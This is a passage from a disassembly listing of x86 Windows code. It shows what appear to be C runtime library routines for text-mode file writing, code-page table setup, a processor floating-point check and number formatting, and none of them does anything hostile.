call near ptr 7C80CCA8h
test eax, eax
jnz loc_41BE48
loc_41BDB9: ; CODE XREF: sub_41BC2B+66�j
; sub_41BC2B+B5�j ...
xor eax, eax
loc_41BDBB: ; CODE XREF: sub_41BC2B+AD�j
; sub_41BC2B+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41BDCD: ; CODE XREF: sub_41BC2B+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41BE01
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_41BE01: ; CODE XREF: sub_41BC2B+1C2�j
cmp ebx, edi
jz short loc_41BDB9
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C80CCA8h
test eax, eax
jz short loc_41BDB9
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_41BE28
push edi
push edi
jmp short loc_41BE2E
; ---------------------------------------------------------------------------
loc_41BE28: ; CODE XREF: sub_41BC2B+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41BE2E: ; CODE XREF: sub_41BC2B+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
nop
call near ptr 7C80A0D4h
mov esi, eax
cmp esi, edi
jz loc_41BDB9
loc_41BE48: ; CODE XREF: sub_41BC2B+165�j
; sub_41BC2B+188�j
mov eax, esi
jmp loc_41BDBB
sub_41BC2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE4F proc near ; CODE XREF: sub_4188AC+A2�p
; sub_41922E+95�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, dword_516C80
push esi
push edi
jnb loc_41BFE3
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:516B80h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_41BFE3
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_41BEA0
loc_41BE99: ; CODE XREF: sub_41BE4F+177�j
xor eax, eax
jmp loc_41BFF7
; ---------------------------------------------------------------------------
loc_41BEA0: ; CODE XREF: sub_41BE4F+48�j
test al, 20h
jz short loc_41BEB0
push 2
push edi
push ecx
call sub_41BA39
add esp, 0Ch
loc_41BEB0: ; CODE XREF: sub_41BE4F+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41BF7F
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_41BFB7
loc_41BED0: ; CODE XREF: sub_41BE4F+F5�j
lea eax, [ebp+var_414]
loc_41BED6: ; CODE XREF: sub_41BE4F+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_41BF0A
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_41BEF5
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_41BEF5: ; CODE XREF: sub_41BE4F+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_41BED6
loc_41BF0A: ; CODE XREF: sub_41BE4F+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
nop
call near ptr 7C810D87h
test eax, eax
jz short loc_41BF74
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_41BF46
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_41BED0
loc_41BF46: ; CODE XREF: sub_41BE4F+EA�j
; sub_41BE4F+12E�j
xor edi, edi
loc_41BF48: ; CODE XREF: sub_41BE4F+150�j
; sub_41BE4F+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_41BFDE
cmp [ebp+arg_0], edi
jz short loc_41BFB7
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_41BFAC
mov dword_515884, 9
mov dword_515888, eax
jmp loc_41BFF4
; ---------------------------------------------------------------------------
loc_41BF74: ; CODE XREF: sub_41BE4F+E0�j
nop
call near ptr 7C910331h
mov [ebp+arg_0], eax
jmp short loc_41BF46
; ---------------------------------------------------------------------------
loc_41BF7F: ; CODE XREF: sub_41BE4F+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
nop
call near ptr 7C810D87h
test eax, eax
jz short loc_41BFA1
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_41BF48
; ---------------------------------------------------------------------------
loc_41BFA1: ; CODE XREF: sub_41BE4F+145�j
nop
call near ptr 7C910331h
mov [ebp+arg_0], eax
jmp short loc_41BF48
; ---------------------------------------------------------------------------
loc_41BFAC: ; CODE XREF: sub_41BE4F+10F�j
push [ebp+arg_0]
call sub_41C91A
pop ecx
jmp short loc_41BFF4
; ---------------------------------------------------------------------------
loc_41BFB7: ; CODE XREF: sub_41BE4F+7B�j
; sub_41BE4F+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41BFCC
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_41BE99
loc_41BFCC: ; CODE XREF: sub_41BE4F+16F�j
mov dword_515884, 1Ch
mov dword_515888, edi
jmp short loc_41BFF4
; ---------------------------------------------------------------------------
loc_41BFDE: ; CODE XREF: sub_41BE4F+FE�j
sub eax, [ebp+var_10]
jmp short loc_41BFF7
; ---------------------------------------------------------------------------
loc_41BFE3: ; CODE XREF: sub_41BE4F+15�j
; sub_41BE4F+37�j
and dword_515888, 0
mov dword_515884, 9
loc_41BFF4: ; CODE XREF: sub_41BE4F+120�j
; sub_41BE4F+166�j ...
or eax, 0FFFFFFFFh
loc_41BFF7: ; CODE XREF: sub_41BE4F+4C�j
; sub_41BE4F+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BE4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BFFC proc near ; CODE XREF: sub_41C3C0+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41C195
mov esi, eax
pop ecx
cmp esi, dword_516C84
mov [ebp+arg_0], esi
jz loc_41C189
xor ebx, ebx
cmp esi, ebx
jz loc_41C17F
xor edx, edx
mov eax, offset dword_43B7D8
loc_41C030: ; CODE XREF: sub_41BFFC+41�j
cmp [eax], esi
jz short loc_41C0A6
add eax, 30h
inc edx
cmp eax, offset off_43B8C8
jl short loc_41C030
lea eax, [ebp+var_18]
push eax
push esi
nop
call near ptr 7C812E76h
cmp eax, 1
jnz loc_41C177
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_516DA0
cmp [ebp+var_18], 1
mov dword_516C84, esi
rep stosd
stosb
mov dword_516EA4, ebx
jbe loc_41C165
cmp [ebp+var_12], 0
jz loc_41C13B
lea ecx, [ebp+var_11]
loc_41C083: ; CODE XREF: sub_41BFFC+139�j
mov dl, [ecx]
test dl, dl
jz loc_41C13B
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_41C094: ; CODE XREF: sub_41BFFC+A8�j
cmp eax, edx
ja loc_41C12F
or byte_516DA1[eax], 4
inc eax
jmp short loc_41C094
; ---------------------------------------------------------------------------
loc_41C0A6: ; CODE XREF: sub_41BFFC+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_516DA0
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_43B7E8[esi]
loc_41C0C2: ; CODE XREF: sub_41BFFC+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_41C0F5
loc_41C0C9: ; CODE XREF: sub_41BFFC+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_41C0F5
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_41C0EE
mov edx, [ebp+var_4]
mov dl, byte_43B7D0[edx]
loc_41C0E3: ; CODE XREF: sub_41BFFC+F0�j
or byte_516DA1[eax], dl
inc eax
cmp eax, edi
jbe short loc_41C0E3
loc_41C0EE: ; CODE XREF: sub_41BFFC+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_41C0C9
loc_41C0F5: ; CODE XREF: sub_41BFFC+CB�j
; sub_41BFFC+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_41C0C2
mov eax, [ebp+arg_0]
mov dword_516C9C, 1
push eax
mov dword_516C84, eax
call sub_41C1DF
lea esi, dword_43B7DC[esi]
mov edi, offset dword_516C90
movsd
movsd
pop ecx
mov dword_516EA4, eax
movsd
jmp short loc_41C184
; ---------------------------------------------------------------------------
loc_41C12F: ; CODE XREF: sub_41BFFC+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41C083
loc_41C13B: ; CODE XREF: sub_41BFFC+7E�j
; sub_41BFFC+8B�j
push 1
pop eax
loc_41C13E: ; CODE XREF: sub_41BFFC+14F�j
or byte_516DA1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41C13E
push esi
call sub_41C1DF
pop ecx
mov dword_516EA4, eax
mov dword_516C9C, 1
jmp short loc_41C16B
; ---------------------------------------------------------------------------
loc_41C165: ; CODE XREF: sub_41BFFC+74�j
mov dword_516C9C, ebx
loc_41C16B: ; CODE XREF: sub_41BFFC+167�j
xor eax, eax
mov edi, offset dword_516C90
stosd
stosd
stosd
jmp short loc_41C184
; ---------------------------------------------------------------------------
loc_41C177: ; CODE XREF: sub_41BFFC+51�j
cmp dword_515908, ebx
jz short loc_41C18D
loc_41C17F: ; CODE XREF: sub_41BFFC+27�j
call sub_41C212
loc_41C184: ; CODE XREF: sub_41BFFC+131�j
; sub_41BFFC+179�j
call sub_41C23B
loc_41C189: ; CODE XREF: sub_41BFFC+1D�j
xor eax, eax
jmp short loc_41C190
; ---------------------------------------------------------------------------
loc_41C18D: ; CODE XREF: sub_41BFFC+181�j
or eax, 0FFFFFFFFh
loc_41C190: ; CODE XREF: sub_41BFFC+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BFFC endp
; =============== S U B R O U T I N E =======================================
sub_41C195 proc near ; CODE XREF: sub_41BFFC+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_515908, 0
cmp eax, 0FFFFFFFEh
jnz short loc_41C1B5
mov dword_515908, 1
nop
jmp near ptr 7C8127A7h
; ---------------------------------------------------------------------------
loc_41C1B5: ; CODE XREF: sub_41C195+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_41C1CA
mov dword_515908, 1
nop
jmp near ptr 7C809915h
; ---------------------------------------------------------------------------
loc_41C1CA: ; CODE XREF: sub_41C195+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_41C1DE
mov eax, dword_5158FC
mov dword_515908, 1
locret_41C1DE: ; CODE XREF: sub_41C195+38�j
retn
sub_41C195 endp
; =============== S U B R O U T I N E =======================================
sub_41C1DF proc near ; CODE XREF: sub_41BFFC+118�p
; sub_41BFFC+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_41C20C
sub eax, 4
jz short loc_41C206
sub eax, 0Dh
jz short loc_41C200
dec eax
jz short loc_41C1FA
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C1FA: ; CODE XREF: sub_41C1DF+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41C200: ; CODE XREF: sub_41C1DF+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41C206: ; CODE XREF: sub_41C1DF+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41C20C: ; CODE XREF: sub_41C1DF+9�j
mov eax, 411h
retn
sub_41C1DF endp
; =============== S U B R O U T I N E =======================================
sub_41C212 proc near ; CODE XREF: sub_41BFFC:loc_41C17F�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_516DA0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_516C90
mov dword_516C84, eax
mov dword_516C9C, eax
mov dword_516EA4, eax
stosd
stosd
stosd
pop edi
retn
sub_41C212 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C23B proc near ; CODE XREF: sub_41BFFC:loc_41C184�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_516C84
nop
call near ptr 7C812E76h
cmp eax, 1
jnz loc_41C374
xor eax, eax
mov esi, 100h
loc_41C265: ; CODE XREF: sub_41C23B+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_41C265
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_41C2B6
push ebx
push edi
lea edx, [ebp+var_D]
loc_41C284: ; CODE XREF: sub_41C23B+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41C2AB
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41C2AB: ; CODE XREF: sub_41C23B+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_41C284
pop edi
pop ebx
loc_41C2B6: ; CODE XREF: sub_41C23B+42�j
push 0
lea eax, [ebp+var_514]
push dword_516EA4
push dword_516C84
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_41D6F3
push 0
lea eax, [ebp+var_214]
push dword_516C84
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_516EA4
call sub_41BC2B
push 0
lea eax, [ebp+var_314]
push dword_516C84
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_516EA4
call sub_41BC2B
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_41C331: ; CODE XREF: sub_41C23B+135�j
mov dx, [ecx]
test dl, 1
jz short loc_41C34F
or byte_516DA1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_41C347: ; CODE XREF: sub_41C23B+127�j
mov byte_516CA0[eax], dl
jmp short loc_41C36B
; ---------------------------------------------------------------------------
loc_41C34F: ; CODE XREF: sub_41C23B+FC�j
test dl, 2
jz short loc_41C364
or byte_516DA1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_41C347
; ---------------------------------------------------------------------------
loc_41C364: ; CODE XREF: sub_41C23B+117�j
and byte_516CA0[eax], 0
loc_41C36B: ; CODE XREF: sub_41C23B+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_41C331
jmp short loc_41C3BD
; ---------------------------------------------------------------------------
loc_41C374: ; CODE XREF: sub_41C23B+1D�j
xor eax, eax
mov esi, 100h
loc_41C37B: ; CODE XREF: sub_41C23B+180�j
cmp eax, 41h
jb short loc_41C399
cmp eax, 5Ah
ja short loc_41C399
or byte_516DA1[eax], 10h
mov cl, al
add cl, 20h
loc_41C391: ; CODE XREF: sub_41C23B+174�j
mov byte_516CA0[eax], cl
jmp short loc_41C3B8
; ---------------------------------------------------------------------------
loc_41C399: ; CODE XREF: sub_41C23B+143�j
; sub_41C23B+148�j
cmp eax, 61h
jb short loc_41C3B1
cmp eax, 7Ah
ja short loc_41C3B1
or byte_516DA1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41C391
; ---------------------------------------------------------------------------
loc_41C3B1: ; CODE XREF: sub_41C23B+161�j
; sub_41C23B+166�j
and byte_516CA0[eax], 0
loc_41C3B8: ; CODE XREF: sub_41C23B+15C�j
inc eax
cmp eax, esi
jb short loc_41C37B
loc_41C3BD: ; CODE XREF: sub_41C23B+137�j
pop esi
leave
retn
sub_41C23B endp
; =============== S U B R O U T I N E =======================================
sub_41C3C0 proc near ; CODE XREF: ___:0041CBD8�p
; ___:0041CC34�p ...
cmp dword_516ECC, 0
jnz short locret_41C3DB
push 0FFFFFFFDh
call sub_41BFFC
pop ecx
mov dword_516ECC, 1
locret_41C3DB: ; CODE XREF: sub_41C3C0+7�j
retn
sub_41C3C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C3DC proc near ; CODE XREF: sub_418AA8+2B�p
; sub_418AA8+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword_516C9C, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_41C400
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_4182F0
add esp, 0Ch
jmp short loc_41C463
; ---------------------------------------------------------------------------
loc_41C400: ; CODE XREF: sub_41C3DC+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_41C445
mov ecx, [ebp+arg_4]
loc_41C40B: ; CODE XREF: sub_41C3DC+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test byte_516DA1[esi], 4
mov [edi], al
jz short loc_41C42F
inc edi
inc ecx
test edx, edx
jz short loc_41C43B
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_41C441
jmp short loc_41C435
; ---------------------------------------------------------------------------
loc_41C42F: ; CODE XREF: sub_41C3DC+3E�j
inc edi
inc ecx
test al, al
jz short loc_41C445
loc_41C435: ; CODE XREF: sub_41C3DC+51�j
test edx, edx
jnz short loc_41C40B
jmp short loc_41C445
; ---------------------------------------------------------------------------
loc_41C43B: ; CODE XREF: sub_41C3DC+44�j
and byte ptr [edi-1], 0
jmp short loc_41C445
; ---------------------------------------------------------------------------
loc_41C441: ; CODE XREF: sub_41C3DC+4F�j
and byte ptr [edi-2], 0
loc_41C445: ; CODE XREF: sub_41C3DC+2A�j
; sub_41C3DC+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_41C460
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41C460: ; CODE XREF: sub_41C3DC+6F�j
mov eax, [ebp+arg_0]
loc_41C463: ; CODE XREF: sub_41C3DC+22�j
pop edi
pop ebp
retn
sub_41C3DC endp
; =============== S U B R O U T I N E =======================================
sub_41C466 proc near ; CODE XREF: sub_418D5F+F�p
push 30000h
push 10000h
call sub_41E764
pop ecx
pop ecx
retn
sub_41C466 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C478 proc near ; CODE XREF: sub_41C4B6:loc_41C4DA�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_4216D0
fstp [ebp+var_8]
fld dbl_4216C8
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_4216C0
fnstsw ax
sahf
jbe short loc_41C4B2
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_41C4B2: ; CODE XREF: sub_41C478+33�j
xor eax, eax
leave
retn
sub_41C478 endp
; =============== S U B R O U T I N E =======================================
sub_41C4B6 proc near ; CODE XREF: sub_418D5F+5�p
push offset aKernel32 ; "KERNEL32"
nop
call near ptr 7C80B6A1h
test eax, eax
jz short loc_41C4DA
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
nop
call near ptr 7C80ADA0h
test eax, eax
jz short loc_41C4DA
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_41C4DA: ; CODE XREF: sub_41C4B6+D�j
; sub_41C4B6+1D�j
jmp sub_41C478
sub_41C4B6 endp
; =============== S U B R O U T I N E =======================================
sub_41C4DF proc near ; CODE XREF: sub_419343+3CB�p
; DATA XREF: sub_418D77+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_4187E1
cmp eax, 65h
pop ecx
jz short loc_41C51F
loc_41C4F3: ; CODE XREF: sub_41C4DF+3E�j
inc esi
cmp dword_43B7AC, 1
jle short loc_41C50C
movsx eax, byte ptr [esi]
push 4
push eax
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41C51B
; ---------------------------------------------------------------------------
loc_41C50C: ; CODE XREF: sub_41C4DF+1C�j
movsx eax, byte ptr [esi]
mov ecx, off_43B5A0
mov al, [ecx+eax*2]
and eax, 4
loc_41C51B: ; CODE XREF: sub_41C4DF+2B�j
test eax, eax
jnz short loc_41C4F3
loc_41C51F: ; CODE XREF: sub_41C4DF+12�j
mov cl, byte_43B7B0
mov al, [esi]
mov [esi], cl
inc esi
loc_41C52A: ; CODE XREF: sub_41C4DF+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41C52A
pop esi
retn
sub_41C4DF endp
; =============== S U B R O U T I N E =======================================
sub_41C539 proc near ; CODE XREF: sub_419343+3E2�p
; DATA XREF: sub_418D77+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, byte_43B7B0
mov cl, [eax]
test cl, cl
jz short loc_41C555
loc_41C549: ; CODE XREF: sub_41C539+1A�j
cmp cl, dl
jz short loc_41C555
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_41C549
loc_41C555: ; CODE XREF: sub_41C539+E�j
; sub_41C539+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_41C586
loc_41C55C: ; CODE XREF: sub_41C539+34�j
mov cl, [eax]
test cl, cl
jz short loc_41C56F
cmp cl, 65h
jz short loc_41C56F
cmp cl, 45h
jz short loc_41C56F
inc eax
jmp short loc_41C55C
; ---------------------------------------------------------------------------
loc_41C56F: ; CODE XREF: sub_41C539+27�j
; sub_41C539+2C�j ...
mov ecx, eax
loc_41C571: ; CODE XREF: sub_41C539+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41C571
cmp [eax], dl
jnz short loc_41C57C
dec eax
loc_41C57C: ; CODE XREF: sub_41C539+40�j
; sub_41C539+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_41C57C
locret_41C586: ; CODE XREF: sub_41C539+21�j
retn
sub_41C539 endp
; =============== S U B R O U T I N E =======================================
sub_41C587 proc near ; DATA XREF: sub_418D77+28�o
; ___:off_43B8D8�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_421700
fnstsw ax
sahf
jb short loc_41C59C
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41C59C: ; CODE XREF: sub_41C587+F�j
xor eax, eax
retn
sub_41C587 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C59F proc near ; CODE XREF: sub_41A824+430�p
; DATA XREF: sub_418D77+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_41C5C8
lea eax, [ebp+var_8]
push eax
call sub_41EC27
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_41C5C8: ; CODE XREF: sub_41C59F+C�j
lea eax, [ebp+arg_8]
push eax
call sub_41EC54
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_41C59F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C5DD proc near ; CODE XREF: sub_41C85A+17�p
; sub_41C8A4+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp byte_515910, 0
push ebx
push esi
jz short loc_41C612
mov ebx, [ebp+arg_8]
mov eax, dword_51590C
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_41C8F5
pop ecx
pop ecx
jmp short loc_41C64A
; ---------------------------------------------------------------------------
loc_41C612: ; CODE XREF: sub_41C5DD+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_41ECF8
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41EC81
add esp, 14h
loc_41C64A: ; CODE XREF: sub_41C5DD+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_41C656
mov byte ptr [eax], 2Dh
inc eax
loc_41C656: ; CODE XREF: sub_41C5DD+73�j
test ebx, ebx
jle short loc_41C66E
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, byte_43B7B0
mov eax, edi
pop edi
mov [eax], cl
loc_41C66E: ; CODE XREF: sub_41C5DD+7B�j
xor ecx, ecx
push offset dword_421708
cmp byte_515910, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_417A00
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_41C695
mov byte ptr [ecx], 45h
loc_41C695: ; CODE XREF: sub_41C5DD+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41C6DA
mov ebx, [esi+4]
dec ebx
jns short loc_41C6A9
neg ebx
mov byte ptr [ecx], 2Dh
loc_41C6A9: ; CODE XREF: sub_41C5DD+C5�j
inc ecx
cmp ebx, 64h
jl short loc_41C6C0
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41C6C0: ; CODE XREF: sub_41C5DD+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_41C6D7
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41C6D7: ; CODE XREF: sub_41C5DD+E7�j
add [ecx+1], bl
loc_41C6DA: ; CODE XREF: sub_41C5DD+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_41C5DD endp
; =============== S U B R O U T I N E =======================================
sub_41C6E1 proc near ; CODE XREF: sub_41C881+13�p
; sub_41C8A4+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp byte_515910, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_41C71C
mov eax, dword_515914
mov ebx, [esp+10h+arg_8]
mov esi, dword_51590C
cmp eax, ebx
jnz short loc_41C74C
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_41C74C
; ---------------------------------------------------------------------------
loc_41C71C: ; CODE XREF: sub_41C6E1+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_41ECF8
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_41EC81
add esp, 14h
loc_41C74C: ; CODE XREF: sub_41C6E1+22�j
; sub_41C6E1+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_41C75A
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_41C75A: ; CODE XREF: sub_41C6E1+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_41C771
push 1
push edi
call sub_41C8F5
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_41C773
; ---------------------------------------------------------------------------
loc_41C771: ; CODE XREF: sub_41C6E1+7E�j
add edi, eax
